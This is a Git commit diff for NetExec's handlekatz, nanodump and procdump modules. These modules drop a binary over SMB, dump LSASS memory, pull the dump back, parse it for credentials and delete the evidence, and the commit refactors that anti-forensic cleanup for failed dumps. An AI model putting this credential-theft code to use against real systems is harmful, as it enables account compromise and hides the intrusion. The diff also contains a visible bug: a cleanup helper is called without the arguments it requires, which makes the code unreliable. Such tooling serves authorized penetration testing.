Merge pull request Pennyw0rth#542 from termanix/fix-dump-files-deleting

NeffIsBack · web-flow · commit 3f06ea98122e · 2025-02-03T00:31:57.000+01:00
Fix lsass Dump Files Deleting Process When Dump Fail
diff --git a/nxc/modules/handlekatz.py b/nxc/modules/handlekatz.py
@@ -50,7 +50,7 @@ def options(self, context, module_options):
 
     def on_admin_login(self, context, connection):
         handlekatz_loc = self.handlekatz_path + self.handlekatz
-        
+
         if self.useembeded:
             try:
                 with open(handlekatz_loc, "wb") as handlekatz:
@@ -78,6 +78,7 @@ def on_admin_login(self, context, connection):
 
         if not p or p == "None":
             context.log.fail("Failed to execute command to get LSASS PID")
+            self.delete_handlekatz_binary(connection, context)
             return
         # we get a CSV string back from `tasklist`, so we grab the PID from it
         pid = p.split(",")[1][1:-1]
@@ -96,12 +97,15 @@ def on_admin_login(self, context, connection):
             context.log.fail("Process lsass.exe error un dump, try with verbose")
             dump = False
 
-        if dump:
+        if not dump:
+            self.delete_handlekatz_binary(connection, context)
+            return
+        else:
             regex = r"([A-Za-z0-9-]*\.log)"
             matches = re.search(regex, str(p), re.MULTILINE)
             if not matches:
                 context.log.display("Error getting the lsass.dmp file name")
-                sys.exit(1)
+                return
 
             machine_name = matches.group()
             context.log.display(f"Copy {machine_name} to host")
@@ -113,12 +117,7 @@ def on_admin_login(self, context, connection):
                 except Exception as e:
                     context.log.fail(f"Error while get file: {e}")
 
-            try:
-                connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz)
-                context.log.success(f"Deleted handlekatz file on the {self.share} share")
-            except Exception as e:
-                context.log.fail(f"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}")
-
+            self.delete_handlekatz_binary()
             try:
                 connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
                 context.log.success(f"Deleted lsass.dmp file on the {self.share} share")
@@ -182,3 +181,10 @@ def on_admin_login(self, context, connection):
                         add_user_bh(credz_bh, None, context.log, connection.config)
                 except Exception as e:
                     context.log.fail(f"Error opening dump file: {e}")
+
+    def delete_handlekatz_binary(self, connection, context):
+        try:
+            connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz)
+            context.log.success(f"Deleted handlekatz file on the {self.share} share")
+        except Exception as e:
+            context.log.fail(f"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}")
diff --git a/nxc/modules/nanodump.py b/nxc/modules/nanodump.py
@@ -149,7 +149,10 @@ def on_admin_login(self, context, connection):
             self.context.log.fail("Process lsass.exe error on dump, try with verbose")
             dump = False
 
-        if dump:
+        if not dump:
+            self.delete_nanodump_binary()
+            return
+        else:
             self.context.log.display(f"Copying {nano_log_name} to host")
             filename = os.path.join(self.dir_result, f"{self.connection.hostname}_{self.connection.os_arch}_{self.connection.domain}.log")
             if self.context.protocol == "smb":
diff --git a/nxc/modules/procdump.py b/nxc/modules/procdump.py
@@ -4,7 +4,6 @@
 
 import base64
 import re
-import sys
 import pypykatz
 from nxc.helpers.bloodhound import add_user_bh
 from nxc.paths import TMP_PATH
@@ -79,15 +78,18 @@ def on_admin_login(self, context, connection):
         else:
             context.log.fail("Process lsass.exe error un dump, try with verbose")
 
-        if dump:
+        if not dump:
+            self.delete_procdump_binary(connection, context)
+            return
+        else:
             regex = r"([A-Za-z0-9-]*.dmp)"
             matches = re.search(regex, str(p), re.MULTILINE)
             machine_name = ""
             if matches:
                 machine_name = matches.group()
             else:
                 context.log.display("Error getting the lsass.dmp file name")
-                sys.exit(1)
+                return
 
             context.log.display(f"Copy {machine_name} to host")
 
@@ -98,11 +100,7 @@ def on_admin_login(self, context, connection):
                 except Exception as e:
                     context.log.fail(f"Error while get file: {e}")
 
-            try:
-                connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
-                context.log.success(f"Deleted procdump file on the {self.share} share")
-            except Exception as e:
-                context.log.fail(f"Error deleting procdump file on share {self.share}: {e}")
+            self.delete_procdump_binary(connection, context)
 
             try:
                 connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
@@ -152,3 +150,10 @@ def on_admin_login(self, context, connection):
                         add_user_bh(credz_bh, None, context.log, connection.config)
                 except Exception as e:
                     context.log.fail("Error openning dump file", str(e))
+
+    def delete_procdump_binary(self, connection, context):
+        try:
+            connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
+            context.log.success(f"Deleted procdump file on the {self.share} share")
+        except Exception as e:
+            context.log.fail(f"Error deleting procdump file on share {self.share}: {e}")
